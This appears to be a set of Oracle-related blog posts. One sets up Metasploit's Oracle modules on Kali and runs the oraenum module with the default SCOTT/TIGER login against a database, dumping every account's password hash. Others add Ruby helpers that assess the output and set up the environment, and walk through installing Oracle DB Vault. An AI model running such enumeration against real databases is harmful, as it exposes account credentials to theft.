Using Oracle Exploits or Auxiliaries from Metasploit Framework on Kali

In this note I will show you how to use the Oracle auxiliaries from Metasploit Framework. Because of copyright issues the Oracle client is not pre-installed on the Kali virtual machine, so the Oracle auxiliaries and exploits cannot be used until the Oracle client is installed.

For example, try to use the oraenum auxiliary:

msf > use auxiliary/admin/oracle/oraenum
msf auxiliary(oraenum) > show options

Module options (auxiliary/admin/oracle/oraenum):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   DBPASS  TIGER            yes       The password to authenticate with.
   DBUSER  SCOTT            yes       The username to authenticate with.
   RHOST                    yes       The Oracle host.
   RPORT   1521             yes       The TNS port.
   SID     ORCL             yes       The sid to authenticate with.

msf auxiliary(oraenum) > set SID DB11G

msf auxiliary(oraenum) > set RHOST 192.200.11.9
RHOST => 192.200.11.9
msf auxiliary(oraenum) > run

[-] Failed to load the OCI library: cannot load such file -- oci8
[-] Try 'gem install ruby-oci8'
[*] Auxiliary module execution completed
msf auxiliary(oraenum) >

As you see, you get a "Failed to load the OCI library" error.

Now we will install the Oracle Instant Client on the Kali Linux machine and link it with Metasploit Framework.

1. Download Oracle Instant Client to the Kali machine

First create the directories needed to install Oracle Instant Client.

root@kali:~# mkdir /opt/oracle
root@kali:~# cd /opt/oracle
root@kali:/opt/oracle#

Download Oracle Instant Client into the /opt/oracle directory from the link below.

http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

I use Kali Linux x86-64.


You need to download all of these files to the /opt/oracle directory:

  • instantclient-basic-linux-12.1.0.2.0.zip
  • instantclient-sqlplus-linux-12.1.0.2.0.zip
  • instantclient-sdk-linux-12.1.0.2.0.zip

root@kali:/opt/oracle# pwd
/opt/oracle
root@kali:/opt/oracle# ls -lrt
total 63364
-rwxr-x--- 1 root root   667174 Aug 6 04:36 instantclient-sdk-linux.x64-12.1.0.2.0.zip
-rwxr-x--- 1 root root 63352239 Aug 6 04:36 instantclient-basic-linux.x64-12.1.0.2.0.zip
-rwxr-x--- 1 root root   861284 Aug 6 04:36 instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
root@kali:/opt/oracle#


2. Install the Oracle client

Unzip the downloaded files and then create the symlink.

root@kali:/opt/oracle# pwd
/opt/oracle
root@kali:/opt/oracle# unzip instantclient-basic-linux.x64-12.1.0.2.0.zip

root@kali:/opt/oracle# unzip instantclient-sqlplus-linux.x64-12.1.0.2.0.zip

root@kali:/opt/oracle# unzip instantclient-sdk-linux.x64-12.1.0.2.0.zip

root@kali:/opt/oracle# cd instantclient_12_1
root@kali:/opt/oracle/instantclient_12_1#

Symlink the shared library:

root@kali:/opt/oracle/instantclient_12_1# ln libclntsh.so.12.1 libclntsh.so

root@kali:/opt/oracle/instantclient_12_1# ls -lh libclntsh.so
-rwxrwxr-x 2 root root 57M Jul 7 2014 libclntsh.so

and set the environment variables:

export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1

Now the Oracle client is ready; just check it:

root@kali:/opt/oracle/instantclient_12_1# sqlplus

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 6 04:45:07 2016

Copyright (c) 1982, 2014, Oracle. All rights reserved.

Enter user-name:

As you see, SQL*Plus is working. You are on the right track.

3. Download the Ruby gem

Now download and extract the gem source release:

root@kali:~# cd /opt/oracle

root@kali:/opt/oracle# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.1.8.zip
--2016-08-06 04:53:22--  https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.1.8.zip
Resolving github.com (github.com)... 192.30.253.112
Connecting to github.com (github.com)|192.30.253.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.1.8 [following]
--2016-08-06 04:53:23--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.1.8
Resolving codeload.github.com (codeload.github.com)... 192.30.253.121
Connecting to codeload.github.com (codeload.github.com)|192.30.253.121|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: 'ruby-oci8-2.1.8.zip'

ruby-oci8-2.1.8.zip     [ <=>      ] 295.28K   547KB/s   in 0.5s

2016-08-06 04:53:24 (547 KB/s) - 'ruby-oci8-2.1.8.zip' saved [302365]


Now unzip the Ruby gem:

root@kali:/opt/oracle# pwd
/opt/oracle
root@kali:/opt/oracle# ls -lrt
total 63664
-rwxr-x--- 1 root root   667174 Aug 6 04:36 instantclient-sdk-linux.x64-12.1.0.2.0.zip
-rwxr-x--- 1 root root 63352239 Aug 6 04:36 instantclient-basic-linux.x64-12.1.0.2.0.zip
-rwxr-x--- 1 root root   861284 Aug 6 04:36 instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
drwxr-xr-x 3 root root     4096 Aug 6 04:41 instantclient_12_1
-rw-r--r-- 1 root root   302365 Aug 6 04:53 ruby-oci8-2.1.8.zip

root@kali:/opt/oracle# unzip ruby-oci8-2.1.8.zip

inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_connection_pool.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_connstr.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_datetime.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_dbi.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_dbi_clob.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_encoding.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_error.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_metadata.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_object.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oci8.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oracle_version.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oradate.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_oranumber.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_package_type.rb
inflating: ruby-oci8-ruby-oci8-2.1.8/test/test_rowid.rb

root@kali:/opt/oracle# ls -lrt
total 63668
drwxr-xr-x 7 root root     4096 Apr 4  2015 ruby-oci8-ruby-oci8-2.1.8
-rwxr-x--- 1 root root   667174 Aug 6 04:36 instantclient-sdk-linux.x64-12.1.0.2.0.zip
-rwxr-x--- 1 root root 63352239 Aug 6 04:36 instantclient-basic-linux.x64-12.1.0.2.0.zip
-rwxr-x--- 1 root root   861284 Aug 6 04:36 instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
drwxr-xr-x 3 root root     4096 Aug 6 04:41 instantclient_12_1
-rw-r--r-- 1 root root   302365 Aug 6 04:53 ruby-oci8-2.1.8.zip

root@kali:/opt/oracle# cd ruby-oci8-ruby-oci8-2.1.8/
root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8#


4. Install libgmp

Install libgmp (needed to build the gem) and set the PATH.

Add the Metasploit Ruby binaries to the PATH environment variable:

# export PATH=/opt/metasploit/ruby/bin:$PATH

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# apt-get install libgmp-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
libgmp-dev is already the newest version (2:6.1.0+dfsg-2).
libgmp-dev set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.


5. Build and install the gem

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# pwd
/opt/oracle/ruby-oci8-ruby-oci8-2.1.8

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# make
ruby -w setup.rb config
setup.rb:280: warning: assigned but unused variable - vname
setup.rb:280: warning: assigned but unused variable - desc
setup.rb:280: warning: assigned but unused variable - default2
---> lib
---> lib/oci8
<--- lib/oci8
---> lib/dbd
<--- lib/dbd
<--- lib
---> ext
---> ext/oci8
/usr/bin/ruby2.2 /opt/oracle/ruby-oci8-ruby-oci8-2.1.8/ext/oci8/extconf.rb
checking for load library path...
LD_LIBRARY_PATH...
checking /opt/oracle/instantclient_12_1... yes
/opt/oracle/instantclient_12_1/libclntsh.so.12.1 looks like an instant client.
checking for cc... ok
checking for gcc... yes
checking for LP64... yes
checking for sys/types.h... yes
checking for ruby header... ok
checking for OCIInitialize() in oci.h... yes
checking for Oracle 8.1.0 API - start
checking for OCIEnvCreate()... yes
checking for OCILobClose()... yes
checking for OCILobCreateTemporary()... yes
checking for OCILobFreeTemporary()... yes
checking for OCILobGetChunkSize()... yes
checking for OCILobIsTemporary()... yes
checking for OCILobLocatorAssign()... yes
checking for OCILobOpen()... yes
checking for OCIMessageGet()... yes

.......

compiling object.c
compiling apiwrap.c
compiling encoding.c
compiling oranumber_util.c
compiling thread_util.c
compiling plthook_elf.c
compiling hook_funcs.c
linking shared-object oci8lib_220.so
make[1]: Leaving directory '/opt/oracle/ruby-oci8-ruby-oci8-2.1.8/ext/oci8'
<--- ext/oci8
<--- ext

And then run make install:

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# pwd
/opt/oracle/ruby-oci8-ruby-oci8-2.1.8
root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# make install
ruby -w setup.rb install
setup.rb:280: warning: assigned but unused variable - vname
setup.rb:280: warning: assigned but unused variable - desc
setup.rb:280: warning: assigned but unused variable - default2
---> lib
mkdir -p /usr/local/lib/site_ruby/2.2.0/
install oci8.rb /usr/local/lib/site_ruby/2.2.0/
---> lib/oci8
mkdir -p /usr/local/lib/site_ruby/2.2.0/oci8
install compat.rb /usr/local/lib/site_ruby/2.2.0/oci8
install encoding-init.rb /usr/local/lib/site_ruby/2.2.0/oci8
install object.rb /usr/local/lib/site_ruby/2.2.0/oci8
install bindtype.rb /usr/local/lib/site_ruby/2.2.0/oci8
install ocihandle.rb /usr/local/lib/site_ruby/2.2.0/oci8
install oracle_version.rb /usr/local/lib/site_ruby/2.2.0/oci8
install connection_pool.rb /usr/local/lib/site_ruby/2.2.0/oci8
install encoding.yml /usr/local/lib/site_ruby/2.2.0/oci8
install properties.rb /usr/local/lib/site_ruby/2.2.0/oci8
install datetime.rb /usr/local/lib/site_ruby/2.2.0/oci8
install cursor.rb /usr/local/lib/site_ruby/2.2.0/oci8
install oci8.rb /usr/local/lib/site_ruby/2.2.0/oci8
install metadata.rb /usr/local/lib/site_ruby/2.2.0/oci8
<--- lib/oci8
---> lib/dbd
mkdir -p /usr/local/lib/site_ruby/2.2.0/dbd
install OCI8.rb /usr/local/lib/site_ruby/2.2.0/dbd
<--- lib/dbd
<--- lib
---> ext
---> ext/oci8
mkdir -p /usr/local/lib/x86_64-linux-gnu/site_ruby/.
install oci8lib_220.so /usr/local/lib/x86_64-linux-gnu/site_ruby/.
<--- ext/oci8
<--- ext

Now try the Oracle auxiliary one more time:

root@kali:/opt/oracle/ruby-oci8-ruby-oci8-2.1.8# msfconsole

msf > use auxiliary/admin/oracle/oraenum
msf auxiliary(oraenum) > set SID DB11G
SID => DB11G
msf auxiliary(oraenum) > set RHOST 192.200.11.9
RHOST => 192.200.11.9
msf auxiliary(oraenum) > run

[*] Running Oracle Enumeration....
[*] The versions of the Components are:
[*] Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
[*] PL/SQL Release 11.2.0.4.0 - Production
[*] CORE 11.2.0.4.0 Production
[*] TNS for Linux: Version 11.2.0.4.0 - Production
[*] NLSRTL Version 11.2.0.4.0 - Production
[*] Auditing:
[*] Database Auditing is enabled!
[*] Auditing of SYS Operations is not enabled!
[*] Security Settings:
[*] SQL92 Security restriction on SELECT is not Enabled
[*] UTL Directory Access is set to
[*] Audit log is saved at /u01/app/oracle/admin/DB11G/adump
[*] Password Policy:
[*] Current Account Lockout Time is set to 1
[*] The Number of Failed Logins before an account is locked is set to 10
[*] The Password Grace Time is set to 7
[*] The Lifetime of Passwords is set to 180
[*] The Number of Times a Password can be reused is set to UNLIMITED
[*] The Maximum Number of Times a Password needs to be changed before it can be reused is set to UNLIMITED
[*] The Number of Times a Password can be reused is set to UNLIMITED
[*] Password Complexity is not checked
[*] Active Accounts on the System in format Username,Password,Spare4 are:
[*] SYS,8A8F025737A9097A,S:4F2AD836742BF4940F8635AF7A23A693069E17C38FB4EB2AAEAF55EA7F07
[*] SYSTEM,2D594E86F93B17A1,S:9AAE92874C63DBC5C43CBC2A37E0C98EAEA902912442EB11BB10070F4102
[*] SCOTT,F894844C34402B67,S:046017C46BF9B45D20FE1F7746FF2346B1185F3F38CCAF3BA5526385828B
[*] USER001,98AD9BF0E3417534,S:D0C57D9B1BB122E8D3B532DFFDB8F65D02DECD724C7A0D2A98AAC28045DF
[*] Expired or Locked Accounts on the System in format Username,Password,Spare4 are:
[*] OUTLN,4A3BA55E08595C81,S:9D0352F4707B0EEF41811E091AF4731E609EDFDD80ABD412B06B2A257529
[*] DIP,CE4A36B8E06CA59C,S:ADE7608F962BD12FE8A6564AA3E96EDA88FB9F2F11B79DCAE28AB902380C
[*] ORACLE_OCM,5A2E026A9157958C,S:E9F3700D7530A6F79F0C5A635B50BCB76F8C18D99D2B9331CEA52B8796A1
[*] DBSNMP,E066D214D5421CCC,S:3F2E9D45692FBD03D26B4EFC38A5461E8713636BB0F768500938D10EC563
[*] APPQOSSYS,519D632B7EE7F63A,S:5E6B6A62DE6FEF350B2C972B1B46126333BF4C37057D8EEF7FDF45ABA6C3
[*] WMSYS,7C9BA362F8314299,S:55E4A57548366A8A27A9CAA4CFE3877D645EDC790B699F809CB4B7C2493D
[*] XS$NULL,,S:000000000000000000000000000000000000000000000000000000000000
[*] EXFSYS,33C758A8E388DEE5,S:36D11106A9E7FBC3289C7683EA8


As you see, it works.
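The run above prints the database's auditing state, its password policy and the stored password hashes of every account. A defender reading that output wants it turned into findings rather than eyeballed, so here is an added example (not part of the original post and not Metasploit code; written in Ruby, the language of Metasploit and of the gem this post builds) that parses the module's text output and flags the weak settings. The sample output is constructed from the run shown above with the hash columns replaced by placeholders, and the thresholds in assess() are this example's own assumptions, not values taken from the post.

```ruby
# Added example: parse oraenum output into a profile and assess it.
# Not from the original post or from Metasploit. Sample constructed from
# the run above; hash columns replaced by placeholders.
ORAENUM_SAMPLE = <<~'OUT'
  [*] Running Oracle Enumeration....
  [*] Auditing:
  [*] Database Auditing is enabled!
  [*] Auditing of SYS Operations is not enabled!
  [*] Password Policy:
  [*] Current Account Lockout Time is set to 1
  [*] The Number of Failed Logins before an account is locked is set to 10
  [*] The Password Grace Time is set to 7
  [*] The Lifetime of Passwords is set to 180
  [*] The Number of Times a Password can be reused is set to UNLIMITED
  [*] Password Complexity is not checked
  [*] Active Accounts on the System in format Username,Password,Spare4 are:
  [*] SYS,<hash-placeholder>,S:<spare4-placeholder>
  [*] SYSTEM,<hash-placeholder>,S:<spare4-placeholder>
  [*] SCOTT,<hash-placeholder>,S:<spare4-placeholder>
  [*] USER001,<hash-placeholder>,S:<spare4-placeholder>
  [*] Expired or Locked Accounts on the System in format Username,Password,Spare4 are:
  [*] OUTLN,<hash-placeholder>,S:<spare4-placeholder>
  [*] XS$NULL,,S:<spare4-placeholder>
OUT

# Policy lines have the form "<label> is set to <value>"; UNLIMITED becomes :unlimited.
POLICY_PATTERNS = {
  lock_time:     /Account Lockout Time is set to (\S+)/,
  failed_logins: /Failed Logins before an account is locked is set to (\S+)/,
  grace_time:    /Password Grace Time is set to (\S+)/,
  life_time:     /Lifetime of Passwords is set to (\S+)/,
  reuse:         /Password can be reused is set to (\S+)/
}.freeze

# "USERNAME,<password hash>,<spare4>" rows in the account sections.
ACCOUNT_LINE = /\A([A-Z0-9_\$\#]+),([^,]*),(.*)\z/

def parse_oraenum(text)
  profile = { policy: {}, active: [], locked: [], hashes_disclosed: 0,
              db_audit: nil, sys_audit: nil, complexity: nil }
  section = nil
  text.each_line do |raw|
    line = raw.sub(/\A\[\*\]\s*/, '').strip          # drop the "[*] " prefix
    POLICY_PATTERNS.each do |key, re|
      next unless (m = re.match(line))
      profile[:policy][key] = m[1] == 'UNLIMITED' ? :unlimited : m[1].to_i
    end
    profile[:db_audit]   = !line.include?(' not ') if line.start_with?('Database Auditing')
    profile[:sys_audit]  = !line.include?(' not ') if line.start_with?('Auditing of SYS')
    profile[:complexity] = !line.include?(' not ') if line.start_with?('Password Complexity')
    section = :active if line.start_with?('Active Accounts')
    section = :locked if line.start_with?('Expired or Locked Accounts')
    next unless section && (m = ACCOUNT_LINE.match(line))
    profile[section] << m[1]
    # an empty hash column (XS$NULL) means there is no password to disclose
    profile[:hashes_disclosed] += 1 unless m[2].empty?
  end
  profile
end

# true when a policy value is UNLIMITED or larger than the allowed maximum
def exceeds?(value, max)
  value == :unlimited || (value.is_a?(Integer) && value > max)
end

# Thresholds are example assumptions in the spirit of common hardening
# baselines; adjust them to your own standard.
def assess(profile)
  pol = profile[:policy]
  findings = []
  findings << 'database auditing is disabled'                 unless profile[:db_audit]
  findings << 'auditing of SYS operations is disabled'        unless profile[:sys_audit]
  findings << 'no password complexity (verify function) enforced' unless profile[:complexity]
  findings << "FAILED_LOGIN_ATTEMPTS is #{pol[:failed_logins]} (max 5)" if exceeds?(pol[:failed_logins], 5)
  findings << "PASSWORD_GRACE_TIME is #{pol[:grace_time]} (max 5)"       if exceeds?(pol[:grace_time], 5)
  findings << "PASSWORD_LIFE_TIME is #{pol[:life_time]} (max 90)"        if exceeds?(pol[:life_time], 90)
  findings << 'password reuse limit is UNLIMITED'                        if pol[:reuse] == :unlimited
  findings << 'PASSWORD_LOCK_TIME is 0 (no lockout)'                     if pol[:lock_time] == 0
  n = profile[:hashes_disclosed]
  findings << "#{n} password hashes readable by the enumeration account" if n > 0
  findings
end

if __FILE__ == $PROGRAM_NAME
  assess(parse_oraenum(ORAENUM_SAMPLE)).each { |f| puts "[!] #{f}" }
end
```

Feed it the real output captured from msfconsole (spool it to a file) instead of the sample; the last finding is the one to act on first, because the account the module logged in with, SCOTT/TIGER in the default options above, could read every password hash in the database.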

Do not forget to put all of these in your .bashrc file:

export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1
export PATH=/opt/metasploit/ruby/bin:$PATH
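Steps 2 to 5 and the .bashrc block above are typed by hand; the following is an added example (not from the original post) that does the symlink and the environment idempotently and finishes with the same check that failed at the top of this post, whether the oci8 gem can be required. Ruby is used because that is what Metasploit and ruby-oci8 run on. The client directory, the Metasploit Ruby path and the 12.1 library version are the ones used in this post and are assumptions for any other release.

```ruby
require 'tmpdir'   # only used by the self-check at the end of this file's tests

# Added example, not from the original post. Paths and version are the
# post's own values; pass different ones for another Instant Client release.
CLIENT_DIR   = '/opt/oracle/instantclient_12_1'
MSF_RUBY_BIN = '/opt/metasploit/ruby/bin'

# libclntsh.so -> libclntsh.so.<version>, created only when missing;
# ruby-oci8's extconf looks for the unversioned name.
def ensure_client_symlink(dir, version = '12.1')
  target = File.join(dir, "libclntsh.so.#{version}")
  link   = File.join(dir, 'libclntsh.so')
  raise "#{target} not found: unzip the basic package into #{dir} first" unless File.exist?(target)
  File.symlink(File.basename(target), link) unless File.symlink?(link) || File.exist?(link)
  link
end

# The variables the post exports. PATH keeps a literal $PATH so the lines can
# be appended to .bashrc without baking in today's value; the Metasploit Ruby
# bin directory goes first so its ruby and gem win over the system ones.
def oracle_env(dir = CLIENT_DIR, msf_ruby_bin = MSF_RUBY_BIN)
  {
    'PATH'            => "#{msf_ruby_bin}:$PATH:#{dir}",
    'SQLPATH'         => dir,
    'TNS_ADMIN'       => dir,
    'LD_LIBRARY_PATH' => dir,
    'ORACLE_HOME'     => dir
  }
end

# One export per line, ready to append to .bashrc.
def export_lines(env = oracle_env)
  env.map { |k, v| "export #{k}=#{v}" }
end

# The check the module itself performs: does `require 'oci8'` succeed?
# (LD_LIBRARY_PATH must already be set in the shell that started Ruby.)
def oci8_loadable?
  require 'oci8'
  true
rescue LoadError
  false
end

if __FILE__ == $PROGRAM_NAME
  puts export_lines
  puts(oci8_loadable? ? 'oci8 gem loads' : 'oci8 gem missing: build ruby-oci8 as shown above')
end
```

Run it once with the exports applied (`source ~/.bashrc` first): if it reports the gem missing, LD_LIBRARY_PATH is usually the culprit, because the gem links against libclntsh.so at load time, not at build time.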


DB Vault Installation to Oracle 12c Container Database


In my latest post I talked about installing Oracle DB Vault in an Oracle 12c non-container database. In this post I want to show you how to install Oracle DB Vault in an Oracle 12c container database.

Actually the task is very similar, but for container databases you should first install it in the root container, and then you can install it in any pluggable database.

To follow this post you should have basic knowledge of Oracle container databases:

https://oracle-base.com/articles/12c/multitenant-overview-container-database-cdb-12cr1

Before starting the installation process, I will show you my configuration.

Host: Oracle Linux 7

DB: Oracle 12c 12.1.0.2.0 with two pluggable databases, pdb1 and pdb2; the database name is CDB3.

During the installation I will connect to the root container and to the pluggable databases using the TNS settings below. As you know, when you create a pluggable database a service with the name of the pluggable database is created automatically.

In your tnsnames.ora file there should be TNS entries like these:
CDB3 =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.200.11.9)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = CDB3)
    )
  )

pdb1 =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.200.11.9)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = pdb1)
    )
  )

pdb2 =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.200.11.9)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = pdb2)
    )
  )

In this post I will first install DB Vault in the root container and then in the pdb1 pluggable database.

Installing DB Vault in the root container

1. First check if DB Vault is already installed:
SQL> connect SYSTEM@CDB3
Enter password:
Connected.
SQL> show con_name

CON_NAME
------------------------------
CDB$ROOT
SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
  2  ( 'Oracle Database Vault','Oracle Label Security');

PARAMETER                 VALUE
------------------------- ----------
Oracle Label Security     FALSE
Oracle Database Vault     FALSE

After the DB Vault installation all these values become TRUE.


2. Take a copy of some privilege views

As the SYSTEM user, take copies of the privilege views in the root container, so that privileges can be compared after the DB Vault installation.

SQL> create table a_cdb_network_acls as select * FROM cdb_network_acls;

Table created.

SQL> create table a_cdb_network_acl_privileges as select * from cdb_network_acl_privileges;

Table created.

SQL> create table a_cdb_tab_privs as Select * from cdb_tab_privs;

Table created.

SQL> create table a_cdb_sys_privs as Select * from cdb_sys_privs;

Table created.

SQL> create table a_cdb_role_privs as Select * from cdb_role_privs;

Table created.

SQL> create table a_cdb_objects as select owner,object_name,object_type from cdb_objects where status='INVALID' and object_type <> 'SYNONYM' ;

Table created.

SQL> create table a_cdb_registry as select * from cdb_registry;

Table created.

SQL>

3. Create the DV Owner and DV Account Manager users

The DV owner user administers DB Vault and the DV Account Manager user administers all Oracle users. Because of separation of duties these two users must be different.

For container databases we create common users.

connect sys as sysdba
SQL> create user c##dvowner identified by oracle CONTAINER=ALL;

User created.

SQL> create user c##dvacctmngr identified by oracle CONTAINER=ALL;

User created.

SQL> grant SET CONTAINER,CREATE SESSION to c##dvowner;

Grant succeeded.

SQL> grant SET CONTAINER,CREATE SESSION to c##dvacctmngr;

Grant succeeded.

4. Configure DB Vault

SQL>
SQL> BEGIN
  2  DVSYS.CONFIGURE_DV (
  3  dvowner_uname => 'c##dvowner',
  4  dvacctmgr_uname => 'c##dvacctmngr');
  5  END;
  6  /

PL/SQL procedure successfully completed.

And compile the invalid objects:

@?/rdbms/admin/utlrp.sql

...Database user "SYS", database schema "APEX_040200", user# "98" 16:45:10
...Compiled 0 out of 3014 objects considered, 0 failed compilation 16:45:10
...271 packages
...263 package bodies
...452 tables
...11 functions
...16 procedures
...3 sequences
...457 triggers
...1320 indexes
...211 views
...0 libraries
...6 types
...0 type bodies
...0 operators
...0 index types
...Begin key object existence check 16:45:10
...Completed key object existence check 16:45:11
...Setting DBMS Registry 16:45:11
...Setting DBMS Registry Complete 16:45:11
...Exiting validate 16:45:11

PL/SQL procedure successfully completed.

5. Enable DB Vault

SQL> connect c##dvowner
Enter password:
Connected.
SQL> show con_name

CON_NAME
——————————
CDB$ROOT
SQL> EXEC DBMS_MACADM.ENABLE_DV;

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete.

6. Restart the database

Bingo, DB Vault is now ready in the container database.

SQL> connect sys as sysdba
Enter password:
Connected.

SQL> startup force
ORACLE instance started.

Total System Global Area 977272832 bytes
Fixed Size 2931520 bytes
Variable Size 645924032 bytes
Database Buffers 322961408 bytes
Redo Buffers 5455872 bytes
Database mounted.
Database opened.

SQL> alter pluggable database all open;

Pluggable database altered.
SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
  2  ( 'Oracle Database Vault','Oracle Label Security');

PARAMETER                 VALUE
------------------------- ----------
Oracle Label Security     TRUE
Oracle Database Vault     TRUE


Now our aim is to install DB Vault in one of our pluggable databases. For the demonstration I will install DB Vault in the PDB1 pluggable database.

7. Grant the common users the privileges to connect to PDB1

SQL> connect sys@pdb1 as sysdba
Enter password:
Connected.
SQL> show con_name

CON_NAME
——————————
PDB1
SQL> grant SET CONTAINER,CREATE SESSION to c##dvowner;

Grant succeeded.

SQL> grant SET CONTAINER,CREATE SESSION to c##dvacctmngr;

Grant succeeded.

8. Configure DB Vault at PDB1

SQL> connect sys@pdb1 as sysdba
Enter password:
Connected.
SQL> show con_name

CON_NAME
——————————
PDB1

SQL> BEGIN
  2  DVSYS.CONFIGURE_DV (
  3  dvowner_uname => 'c##dvowner',
  4  dvacctmgr_uname => 'c##dvacctmngr');
  5  END;
  6  /

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete.

Now compile the invalid objects:

@?/rdbms/admin/utlrp.sql

...Database user "SYS", database schema "APEX_040200", user# "98" 16:59:40
...Compiled 0 out of 3014 objects considered, 0 failed compilation 16:59:41
...271 packages
...263 package bodies
...452 tables
...11 functions
...16 procedures
...3 sequences
...457 triggers
...1320 indexes
...211 views
...0 libraries
...6 types
...0 type bodies
...0 operators
...0 index types
...Begin key object existence check 16:59:41
...Completed key object existence check 16:59:41
...Setting DBMS Registry 16:59:41
...Setting DBMS Registry Complete 16:59:41
...Exiting validate 16:59:41

PL/SQL procedure successfully completed.

9. Enable DB Vault at PDB1

SQL> connect c##dvowner@pdb1
Enter password:
Connected.
SQL> EXEC DBMS_MACADM.ENABLE_DV;

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete.


10. Restart the PDB1 pluggable database

SQL> startup force;
ORACLE instance started.

Total System Global Area 977272832 bytes
Fixed Size 2931520 bytes
Variable Size 645924032 bytes
Database Buffers 322961408 bytes
Redo Buffers 5455872 bytes
Database mounted.
Database opened.
SQL> alter pluggable database all open;

Pluggable database altered.

Now DB Vault is installed in the PDB1 pluggable database.

Control Points After DB Vault Installation to Oracle 12c Database


After installing DB Vault in an Oracle 12c database you should check some important points. In this note I will give some explanation of these post-installation operations.

If you want to learn about the DB Vault installation itself, please look at the DB Vault Installation post.

1. Check invalid objects one more time

Normally the system objects are made valid with this script:

@?/rdbms/admin/utlrp.sql

But you should check the application objects as well, because some application objects may stay invalid for various reasons. You should report all these changes.

As you know, before the DB Vault installation we created a table holding all invalid objects in the database (the name of this table is a_dba_objects). Now take one more sample of invalid objects to compare with the before image.

SQL> create table b_dba_objects as select owner,object_name,object_type from dba_objects where status='INVALID' and object_type <> 'SYNONYM' ;

Table created.

Now compare the before and after tables:

SQL> select * from a_dba_objects minus select * from b_dba_objects
2 ;

no rows selected

The difference should be empty, as you expect; if there are rows you should try to resolve them, and maybe one more compilation is required. Note that this query lists only objects that were invalid before and are not invalid now; objects that the installation newly invalidated appear only in the reverse query (b_dba_objects minus a_dba_objects), so run both directions.

2. Check the Oracle components

After the DB Vault installation the status of some Oracle components can change. Take a copy of the dba_registry view and check the status of each component.

SQL> create table b_dba_registry as select * from dba_registry;

Table created.

SQL> column comp_name format a50
SQL> column status format a10
SQL> select comp_name, status from dba_registry;

COMP_NAME                                          STATUS
-------------------------------------------------- ----------
Oracle Database Vault                              VALID
Oracle Application Express                         VALID
Oracle Label Security                              VALID
Spatial                                            VALID
Oracle Multimedia                                  VALID
Oracle Text                                        VALID
Oracle Workspace Manager                           VALID
Oracle XML Database                                VALID
Oracle Database Catalog Views                      VALID
Oracle Database Packages and Types                 VALID
JServer JAVA Virtual Machine                       VALID
Oracle XDK                                         VALID
Oracle Database Java Packages                      VALID
OLAP Analytic Workspace                            VALID
Oracle OLAP API                                    VALID
Oracle Real Application Clusters                   OPTION OFF

16 rows selected.

3. Make a copy of the privilege views

This is a required operation: some privileges may change during the installation, and this can cause problems in your applications. At the same time you should copy all Oracle parameters into a table.

SQL> create table b_dba_network_acls as select * FROM cdb_network_acls;

Table created.

SQL> create table b_dba_network_acl_privileges as select * from cdb_network_acl_privileges;

Table created.

SQL> create table b_gv$parameter as select * from gv$parameter ;

Table created.

SQL> create table b_dba_tab_privs as Select * from dba_tab_privs;

Table created.

SQL> create table b_dba_sys_privs as Select * from dba_sys_privs;

Table created.
SQL> create table b_dba_role_privs as Select * from dba_role_privs;

Table created.


4. Re-grant the privileges that were revoked during the DB Vault installation

